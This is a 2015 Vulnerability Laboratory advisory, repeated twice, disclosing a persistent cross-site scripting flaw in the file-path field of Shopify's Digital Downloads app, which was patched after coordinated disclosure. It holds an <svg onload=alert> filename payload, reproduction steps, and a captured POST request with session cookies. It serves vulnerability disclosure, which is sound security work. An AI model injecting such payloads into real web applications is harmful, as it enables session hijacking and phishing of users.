Vulnerability Laboratory ID (VL-ID):
====================================
1593
Common Vulnerability Scoring System:
====================================
4.1
Product & Service Introduction:
===============================
Shopify is a Canadian commerce company headquartered in Ottawa, Ontario that develops computer software for online stores and retail
point-of-sale systems. Shopify was founded in 2004, and was initially based on earlier software written by its founders for their online snowboard store.
(Copy of the Vendor Homepage: http://www.shopify.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official Shopify online service web-application.
Technical Details & Description:
================================
An application-side validation vulnerability has been discovered in the official Shopify online service web-application.
The vulnerability allows remote attackers to comrpomise user accounts by persistent malicious inject of script codes.
The vulnerability has been located in the `attachment%5Bfilepath` value of the `attachments` module POST method request. Remote attackers
are able to inject malicious script codes to the application-side of the online-service module. The request method to inject is POST and
the attack vector is located on the application-side of the service. The attacker manipulates via live session tamper the `attachment >
filepath` value to compromise the follow up application GET method requests.
The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.1.
Exploitation of the input and validation web vulnerability requires low or medium user interaction and no privilege web-application user account.
Successful exploitation of the persistent web vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external
malicious source and persistent manipulation of affected or connected module context.
Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with low privilege application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability in shopify ...
1. Installing the Digital Downloads App in *.myshopify.com
2. Install the app https://apps.shopify.com/digital-downloads
3. Select product and click Add Digital Attachment
4. Click to upload file and upload file with name <svg onload=alert(1)>
5. The code <svg onload=alert(1)> will execute XSS
Note: <span class="file-name"><strong>Success:</strong> <svg onload="alert(1)"/></span> [tested and verified with mozilla firefox]
6. Successful reproduce of the remote vulnerability!
Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the shopify frontend is estimated as medium. (CVSS 4.1)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.
===============
Shopify Bug Bounty #8 - (FilePath) Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1592
Release Date:
=============
2015-09-04
Vulnerability Laboratory ID (VL-ID):
====================================
1593
Common Vulnerability Scoring System:
====================================
4.1
Product & Service Introduction:
===============================
Shopify is a Canadian commerce company headquartered in Ottawa, Ontario that develops computer software for online stores and retail
point-of-sale systems. Shopify was founded in 2004, and was initially based on earlier software written by its founders for their online snowboard store.
(Copy of the Vendor Homepage: http://www.shopify.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official Shopify online service web-application.
Vulnerability Disclosure Timeline:
==================================
2015-08-09: Researcher Notification & Coordination (Hadji Samir - Evolution Security GmbH)
2015-08-11: Vendor Notification (Shopify - Security & Bug Bounty Team)
2015-08-13: Vendor Response/Feedback (Shopify - Security & Bug Bounty Team
2015-08-14: Vendor Fix/Patch (Shopify - Developer Team)
2015-09-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Shopify Inc.
Product: Shopify - Online Service (Web-Application) 2015 Q3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side validation vulnerability has been discovered in the official Shopify online service web-application.
The vulnerability allows remote attackers to comrpomise user accounts by persistent malicious inject of script codes.
The vulnerability has been located in the `attachment%5Bfilepath` value of the `attachments` module POST method request. Remote attackers
are able to inject malicious script codes to the application-side of the online-service module. The request method to inject is POST and
the attack vector is located on the application-side of the service. The attacker manipulates via live session tamper the `attachment >
filepath` value to compromise the follow up application GET method requests.
The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.1.
Exploitation of the input and validation web vulnerability requires low or medium user interaction and no privilege web-application user account.
Successful exploitation of the persistent web vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external
malicious source and persistent manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Page:
[+] attachments
Vulnerable Parameter(s):
[+] attachment%5Bfilepath
Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with low privilege application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability in shopify ...
1. Installing the Digital Downloads App in *.myshopify.com
2. Install the app https://apps.shopify.com/digital-downloads
3. Select product and click Add Digital Attachment
4. Click to upload file and upload file with name <svg onload=alert(1)>
5. The code <svg onload=alert(1)> will execute XSS
Note: <span class="file-name"><strong>Success:</strong> <svg onload="alert(1)"/></span> [tested and verified with mozilla firefox]
6. Successful reproduce of the remote vulnerability!
--- PoC Session Logs [POST] ---
POST https://delivery.shopifyapps.com/attachments
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[-1] Mime Type[application/json]
Request Headers:
Host[delivery.shopifyapps.com]
User-Agent[Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
X-CSRF-Token[tQMmbiufetQoGo8QyilppAQXeTiMl1gBOHh3fY1JroxPQRl0GppuRe8XYOi
PUI3F2gW93r5Vbqwo+mTzmU2spQ==]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[https://delivery.shopifyapps.com/products/1381861509?hmac=42ee70
e18d01e5e4a3d323a002f2a9454bbe6ce3baed5795ba6ed7bd4ee37de1&protocol=http
s%3A%2F%2F&shop=testdz-2.myshopify.com&signature=942719fd26a31a2ab2ea916
7923a6cadÃ?tamp=1439553626]
Content-Length[248]
Cookie[_delivery_session=TDdkTnNiWk8rMFhUNnl2d0diRVNrYzVSM00rdysyZmMzeDR
RV1JlcGk5WEZrRjF2OHRUUG01NkdnM0hrcEQ2YnA2cllVcnJjMjY5dDRSdlZjNnJ3RGg2L1J
XelRvQmk0QnZNRzRvVGJ1akJ0aW54VE5TWnhIV0k2QUpIS0tHczNEcjcxZFNWVFJxODMwTlY
2ZU9qQVdDR0NmcFk1dXdzMU5aRE5Fd2JPakNXakJvdnM0S1BXR1pyYlFnRjRQd0tEbGJTdGg
4RlBscEh1NzhkQjhiZzRFS2pqZkk4ZTZ4Q1UrM0ZJMGs1ZlZkNmk1T0NWWUMxdnFTSzJSell
HTVMyV3ZyTXJVMTdCZEk3eU52V3Z4Y1EzT0hEV2dBdEV4OU9EcW9JbjR0RWRNNGU2dyt4OS9
LVjBtT1oxQVZZbHVNNGtyY01mTDh5YkVieHI0dDRyOWZzM0hWYXRWMWtIKzAzQWt6c2dUK2l
ieG8wPS0tRDZoRFRrbmU0aHRBMitoeTMvVmlBQT09--88390748471908d3c4b05dec54c02
be53c163262]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
attachment%5Bfilepath%5D[%3Csvg+onload%3Dalert('xss_by_samir')%3E]
attachment%5Bfilesize%5D[0]
attachment%5Bfile_content_type%5D[]
attachment%5Bproduct_id%5D[1381861509]
attachment%5Bvariant_id%5D[4244815685]
attachment%5Bupload_status%5D[authenticating]
Response Headers:
Server[Cowboy]
Connection[close]
Date[Fri, 14 Aug 2015 12:00:41 GMT]
Status[200 OK]
X-XSS-Protection[1; mode=block]
X-Content-Type-Options[nosniff]
P3P[CP="Shopify does not support P3P."]
Content-Type[application/json; charset=utf-8]
Etag[W/"d50fff924fa2e268191b45876ef9aa2f"]
Cache-Control[max-age=0, private, must-revalidate]
Set-Cookie[_delivery_session=dXVldzlGWkNkZHluMDE2SEt5N1RMeURnVDdnYU0rK3d
lekVReHExTTBEMEdBdVJ0SDJvcVRXYUhxdGl3TVRCdlY1N1dGZ1FaTWNycVVzc0x6dmhTOVN
5L05rcko5VGdLN3BRZFBVODVjWFhvTnBEUDFkc21yN2RkRjlGekdDYU9MdTY0UTBsZFhzUkE
2R2ptMU95U25udS9iZGM5d3VlcTVFT3UrR2wyR2JRL3R1K1paeWRNcVdsTGloZ1N5WVZsZER
DamY4MWsveldCcU5GTTM1cW01ZURKbXNCRzZia3RqRkgrY0lSd09yeEREQmR2a0dvaGc0V1h
BWUhnclI1Zy92aDlHTnFYaFhlUVJzUjNGWUFhR1VGRXA5ZFhZQmNTNlVKNkU0VVBTc0pQSkd
yWk4wczQ1N1dXQVZNcHFRM2ZjUmMyYmx0UU1uMzlyVEdBME1rKzhLYmxRLzQ5aWNEaHBMcFB
KU091MC9VPS0tUXNpUkM1cks5NHp5ZWFZbTFIcDBPdz09--2d0ebbcf2adcca4a94ee12e73
2b4900085faa6e0; path=/; HttpOnly]
X-Request-Id[817696c4-6ccf-4a95-a497-3c1c4219085b]
X-Runtime[0.133538]
Via[1.1 vegur]
Reference(s):
https://delivery.shopifyapps.com/
https://delivery.shopifyapps.com/attachments
Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the shopify frontend is estimated as medium. (CVSS 4.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [samir (at) evolution-sec (dot) com [email concealed]]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]�
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x19
8E9928%29.txt
[ reply ]